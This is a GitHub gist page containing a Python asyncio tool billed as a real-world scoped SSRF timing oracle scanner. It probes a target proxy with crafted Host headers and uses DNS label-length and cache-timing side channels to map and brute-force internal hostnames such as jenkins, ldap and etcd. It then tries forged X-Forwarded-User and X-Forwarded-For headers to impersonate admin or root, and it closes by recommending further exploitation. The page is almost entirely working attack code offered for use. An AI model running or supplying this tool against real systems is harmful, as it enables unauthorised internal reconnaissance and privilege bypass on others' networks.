Created
May 14, 2026 17:55
-
-
Save ncouture/6fc1f552fa2bdea0614ada98f42cf16a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import time | |
| import asyncio | |
| import argparse | |
| import aiohttp | |
| from typing import Dict, Tuple, Optional, List | |
| # Scoped SSRF timing fuzzer | |
| class ScopedSsrfTimingFuzzer: | |
| """ | |
| Real-world asynchronous SSRF timing oracle fuzzer. | |
| Targets proxies/reverse proxies vulnerable to scoped SSRF via: | |
| - DNS cache side-channel (cache hit vs miss timing) | |
| - DNS label length validation side-channel | |
| """ | |
| def __init__(self, target_url: str, timeout: float = 10.0, verify_ssl: bool = True): | |
| self.target_url = target_url.rstrip("/") | |
| self.timeout = aiohttp.ClientTimeout(total=timeout) | |
| self.verify_ssl = verify_ssl | |
| self.session: Optional[aiohttp.ClientSession] = None | |
| self.base_latency: Optional[float] = None | |
| async def __aenter__(self): | |
| self.session = aiohttp.ClientSession( | |
| timeout=self.timeout, connector=aiohttp.TCPConnector(ssl=self.verify_ssl) | |
| ) | |
| return self | |
| async def __aexit__(self, exc_type, exc_val, exc_tb): | |
| if self.session: | |
| await self.session.close() | |
| async def _measure_request( | |
| self, host: str, extra_headers: Optional[Dict[str, str]] = None | |
| ) -> Tuple[int, Dict[str, str], float]: | |
| """Send a single probe and return (status, headers, duration)""" | |
| start = time.perf_counter() | |
| headers = { | |
| "Host": host, | |
| "User-Agent": "Mozilla/5.0 (compatible; SSRF-Scanner)", | |
| } | |
| if extra_headers: | |
| headers.update(extra_headers) | |
| try: | |
| async with self.session.get( | |
| self.target_url, headers=headers, allow_redirects=False, ssl=self.verify_ssl | |
| ) as resp: | |
| duration = time.perf_counter() - start | |
| return resp.status, dict(resp.headers), duration | |
| except asyncio.TimeoutError: | |
| duration = time.perf_counter() - start | |
| return 0, {"X-Error": "Timeout"}, duration | |
| except Exception as e: | |
| duration = time.perf_counter() - start | |
| return 0, {"X-Error": str(e)[:100]}, duration | |
| async def calibrate_baseline(self, samples: int = 5) -> float: | |
| """Calibrate baseline latency using an obviously out-of-scope domain""" | |
| print("[*] Calibrating baseline latency...") | |
| total = 0.0 | |
| for _ in range(samples): | |
| _, _, dur = await self._measure_request("nonexistent-external-domain-1234567890.com") | |
| total += dur | |
| self.base_latency = total / samples | |
| print(f"[+] Baseline latency: {self.base_latency * 1000:.2f}ms") | |
| return self.base_latency | |
| async def analyze_label_length_oracle(self, scope_suffix: str = ".internal.corp") -> bool: | |
| """ | |
| DNS Label Length Oracle (RFC 1035: max 63 octets per label) | |
| A valid 63-char label is processed differently than a 64-char one | |
| if the proxy performs DNS resolution before length validation. | |
| """ | |
| valid_label = "a" * 63 + scope_suffix | |
| invalid_label = "a" * 64 + scope_suffix | |
| t_valid = (await self._measure_request(valid_label))[2] | |
| t_invalid = (await self._measure_request(invalid_label))[2] | |
| delta = t_valid - t_invalid | |
| active_processing = delta > 0.025 # Threshold tunable per environment | |
| print( | |
| f"[Label Oracle] Scope: *{scope_suffix:<35} | " | |
| f"L63: {t_valid * 1000:6.2f}ms | L64: {t_invalid * 1000:6.2f}ms | " | |
| f"Δ: {delta * 1000:5.2f}ms | Active: {active_processing}" | |
| ) | |
| return active_processing | |
| async def analyze_dns_cache_oracle(self, target_host: str, retries: int = 2) -> bool: | |
| """ | |
| DNS Cache Hit Oracle. | |
| First request → potential cache miss (full resolution). | |
| Second request → cache hit if the domain was resolved internally. | |
| """ | |
| deltas = [] | |
| for i in range(retries): | |
| # Probe 1 | |
| t1 = (await self._measure_request(target_host))[2] | |
| # Probe 2 immediately after | |
| t2 = (await self._measure_request(target_host))[2] | |
| delta = t1 - t2 | |
| deltas.append(delta) | |
| print( | |
| f"[Cache Oracle] {target_host:<45} | P1: {t1 * 1000:6.2f}ms | " | |
| f"P2: {t2 * 1000:6.2f}ms | Δ: {delta * 1000:5.2f}ms" | |
| ) | |
| avg_delta = sum(deltas) / len(deltas) | |
| is_likely_internal = avg_delta > 0.028 # Adjust threshold based on calibration | |
| if is_likely_internal: | |
| print(f"[+] POTENTIAL INTERNAL HOST: {target_host}") | |
| return is_likely_internal | |
| async def brute_force_internal_hosts( | |
| self, wordlist: List[str], scope_suffix: str = ".fictional-enterprise.local" | |
| ): | |
| """Brute force common internal hostnames""" | |
| print(f"\n[*] Starting brute-force on {len(wordlist)} candidates...") | |
| discovered = [] | |
| for host in wordlist: | |
| if not host.endswith(scope_suffix): | |
| host = ( | |
| host + scope_suffix | |
| if not host.endswith(".") | |
| else host.rstrip(".") + scope_suffix | |
| ) | |
| vulnerable = await self.analyze_dns_cache_oracle(host) | |
| if vulnerable: | |
| discovered.append(host) | |
| return discovered | |
| async def test_privilege_impersonation(self, target_host: str): | |
| """Test common header-based privilege escalation vectors""" | |
| print(f"\n[*] Testing impersonation vectors on {target_host}") | |
| vectors = [ | |
| {"X-Forwarded-User": "admin", "X-Forwarded-For": "127.0.0.1"}, | |
| {"X-Forwarded-User": "system-admin", "X-Original-User": "root"}, | |
| {"X-Forwarded-For": "::1", "X-Real-IP": "10.0.0.1"}, | |
| {"X-Forwarded-User": "administrator", "X-Authenticated-User": "admin"}, | |
| ] | |
| base_status, base_headers, _ = await self._measure_request(target_host) | |
| print( | |
| f" Base access → {base_status} | {base_headers.get('X-Privilege-Level', 'None')}" | |
| ) | |
| for headers in vectors: | |
| status, resp_headers, _ = await self._measure_request(target_host, headers) | |
| priv = resp_headers.get("X-Privilege-Level") or resp_headers.get("X-Role") or "None" | |
| print(f" + Headers {list(headers.keys())} → {status} | Privilege: {priv}") | |
| async def main(): | |
| parser = argparse.ArgumentParser(description="Scoped SSRF Timing Oracle Scanner") | |
| parser.add_argument("target", help="Target URL (e.g. http://proxy.internal:8080/endpoint)") | |
| parser.add_argument("--wordlist", help="Path to subdomain wordlist", default=None) | |
| parser.add_argument("--scope", default=".internal.corp", help="Internal domain suffix") | |
| parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification") | |
| args = parser.parse_args() | |
| print("[*] Real-World Scoped SSRF Timing Oracle Framework") | |
| print(f"[+] Target: {args.target}\n") | |
| async with ScopedSsrfTimingFuzzer(args.target, verify_ssl=not args.no_ssl_verify) as fuzzer: | |
| await fuzzer.calibrate_baseline() | |
| print("\n" + "=" * 80) | |
| print("PHASE 1: SCOPE DETECTION (Label Length Oracle)") | |
| print("=" * 80) | |
| await fuzzer.analyze_label_length_oracle(args.scope) | |
| await fuzzer.analyze_label_length_oracle(".external-attackers.com") # negative control | |
| print("\n" + "=" * 80) | |
| print("PHASE 2: INTERNAL HOST DISCOVERY (DNS Cache Oracle)") | |
| print("=" * 80) | |
| # Default wordlist for demonstration / common internal names | |
| default_candidates = [ | |
| "admin", | |
| "api", | |
| "internal", | |
| "staging", | |
| "dev", | |
| "prod", | |
| "core", | |
| "auth", | |
| "login", | |
| "db", | |
| "database", | |
| "ldap", | |
| "jenkins", | |
| "gitlab", | |
| "confluence", | |
| "jira", | |
| "grafana", | |
| "prometheus", | |
| "kubernetes", | |
| "etcd", | |
| ] | |
| wordlist = default_candidates | |
| if args.wordlist: | |
| try: | |
| with open(args.wordlist) as f: | |
| wordlist = [ | |
| line.strip() for line in f if line.strip() and not line.startswith("#") | |
| ] | |
| print(f"[+] Loaded {len(wordlist)} entries from wordlist") | |
| except Exception as e: | |
| print(f"[-] Failed to load wordlist: {e}") | |
| discovered = await fuzzer.brute_force_internal_hosts(wordlist, args.scope) | |
| print("\n" + "=" * 80) | |
| print("PHASE 3: PRIVILEGE ESCALATION TESTING") | |
| print("=" * 80) | |
| for host in discovered[:3]: # Test top discovered hosts | |
| await fuzzer.test_privilege_impersonation(host) | |
| if discovered: | |
| print(f"\n[+] Discovered internal hosts: {discovered}") | |
| print("[!] Manual verification and further exploitation recommended.") | |
| if __name__ == "__main__": | |
| asyncio.run(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment